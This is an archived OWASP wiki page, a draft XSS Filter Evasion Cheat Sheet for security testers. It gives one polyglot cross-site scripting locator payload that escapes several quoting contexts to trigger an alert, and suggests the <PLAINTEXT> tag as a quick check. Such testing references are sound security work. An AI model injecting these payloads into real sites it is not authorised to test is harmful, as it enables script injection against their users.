This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
XSS Filter Evasion Cheat Sheet
DRAFT CHEAT SHEET - WORK IN PROGRESS
Introduction
This article is focused on providing application security testing professionals with a guide to assist in Cross Site Scripting testing.
Tests
XSS Locator
Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. Use this URL encoding calculator to encode the entire string. Tip: if you're in a rush and need to quickly check a page, often times injecting the depreciated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably:
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'> <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
References
Authors and Primary Editors
RSnake
OWASP Cheat Sheets Project Homepage